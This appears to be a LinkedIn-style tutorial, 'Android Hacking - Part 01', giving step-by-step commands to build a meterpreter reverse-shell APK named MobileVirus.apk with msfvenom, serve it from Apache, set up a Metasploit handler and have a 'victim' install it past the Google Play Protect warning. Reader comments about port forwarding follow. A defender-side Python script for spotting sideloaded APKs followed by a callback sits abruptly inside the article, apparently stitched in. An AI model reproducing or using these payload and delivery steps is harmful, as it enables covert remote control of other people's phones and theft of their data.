Android Hacking - Part 01

This is my first article on Android hacking. In this article we are going to exploit an Android mobile with a simple msfvenom payload.

Here we go....

Step 01

In the first step we have to find out our IP address (IPv4). In the Kali Linux terminal I type the command "ifconfig wlan0" to find the current IP address of my attacker machine (Kali Linux).

If you are using Kali Linux in VMware or VirtualBox then your interface will be "eth0" so you can find your IP address with "ifconfig eth0".

Attacker IP Address

Step 02

In the 2nd step we need to create an Android payload with msfvenom.

Command: sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.13 lport=42474 -o MobileVirus.apk

Need to Know:

  • sudo: is for root privileges
  • msfvenom: the tool itself, used for creating payloads
  • -p: payload option
  • Payload: android/meterpreter/reverse_tcp
  • lhost: local IP address of your attacker machine (Kali Linux)
  • lport: the local port where the connection reverses to your IP address; you can use any random port like (4444, 42474)
  • -o: is for the output name of your application, in my case (MobileVirus.apk)

android payload

Step 03

Transfer the payload file (MobileVirus.apk) to your apache2 folder and then start your apache2 server.

Command: sudo cp MobileVirus.apk /var/www/html

Command: sudo service apache2 start (Start Apache2 Server)

Need to Know

  • sudo: is for root privileges
  • cp: copy command in Linux
  • /var/www/html/: root folder of the apache2 server

copy payload into apache2 folder
Apache server folder

Step 04

I am going to launch metasploit-framework to create a handler.

Command: sudo msfconsole (console of Metasploit-Framework)

msfconsole

Setting Handler

  1. use multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set lhost 192.168.1.13
  4. set lport 42474

setting up multi/handler

Step 05

Installing the payload on the victim mobile

Type the IP address of the attacker machine (Kali Linux) into the victim mobile

Download the application (MobileVirus.apk)

After the download you can install the application (MobileVirus.apk)

Google Play Protect Warning: you can click on install anyway to proceed with installation.

Note: I will write an article on "How to Bypass Google Play Protect" later in this series.

When the application (MobileVirus.apk) is installed, click on open

We Got Android

When the application is opened we get back a reverse connection

Type the command: "sysinfo" to check your victim mobile information.
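A defender-side view of the steps above, as an added example that is not part of the original article: it correlates an APK fetched from a bare IP address with a later non-web TCP connection from the same device to that address. The log format, the client addresses and the 30-minute window are assumptions; the server address, file name and port are the ones used in this article.

```python
import ipaddress
from datetime import datetime, timedelta
from urllib.parse import urlsplit

APK_MIME = "application/vnd.android.package-archive"
WINDOW = timedelta(minutes=30)  # assumed correlation window
WEB_PORTS = {80, 443}
# Constructed events in a hypothetical "<time> <kind> <client> ..." format.
SAMPLE_LOG = """\
2024-05-01T10:00:00 http 192.168.1.50 GET http://192.168.1.13/MobileVirus.apk 200 application/vnd.android.package-archive
2024-05-01T10:00:40 http 192.168.1.51 GET http://downloads.example.com/app.apk 200 application/vnd.android.package-archive
2024-05-01T10:01:30 flow 192.168.1.50 192.168.1.13 42474 tcp
2024-05-01T10:02:00 flow 192.168.1.51 192.168.1.13 42474 tcp
2024-05-01T11:30:00 flow 192.168.1.50 192.168.1.13 4444 tcp
"""

def is_ip_literal(host):
    """True when the URL host is a raw IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def find_sideload_callbacks(log_text):
    """Return (client, server, port) for callbacks that follow an APK download."""
    downloads = {}  # (client, server_ip) -> time the APK was fetched
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # not one of the two event kinds
        ts, kind, client = datetime.fromisoformat(fields[0]), fields[1], fields[2]
        if kind == "http":
            url = urlsplit(fields[4])
            host = url.hostname or ""
            is_apk = url.path.lower().endswith(".apk") or fields[6:7] == [APK_MIME]
            if is_apk and is_ip_literal(host):
                downloads[(client, host)] = ts
        elif kind == "flow":
            server, port = fields[3], int(fields[4])
            fetched = downloads.get((client, server))
            if fetched and port not in WEB_PORTS and timedelta(0) <= ts - fetched <= WINDOW:
                alerts.append((client, server, port))
    return alerts

if __name__ == "__main__":
    for alert in find_sideload_callbacks(SAMPLE_LOG):
        print("sideloaded APK followed by callback:", alert)
```

Only the first device is flagged: the second never fetched an APK from that address, and the last flow falls outside the window.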

Got Android

Note: if you find any mistake or typing error please inform me; you can also ask questions.

---------------------------------------END----------------------------------------



IP address is not opening in my mobile


Is port forwarding required for this? It's for targets that are out of your network

Mumtaz Zazai

Cybersecurity Specialist | Computer Science Graduate | Network Diploma Holder | IT & Penetration Testing Expert

10 months

Great article.. I need a mentor in android...

PRIYASH PRABHUDESAI

MCA @RVITM | Cybersecurity Enthusiast | Try Hack Me Top 08% | ISC2 CC Candidate |

11 months

Sir, I have 2 questions. 1) Sir I have followed the exact process but it didn't get installed on the mobile. Error Message was like App Not Installed. The only thing I have done differently is transfer the APK file through USB and not through the localhost site. So what changes do I have to make to make that APK file install properly? 2) Is port forwarding required for this?

Please add part 2
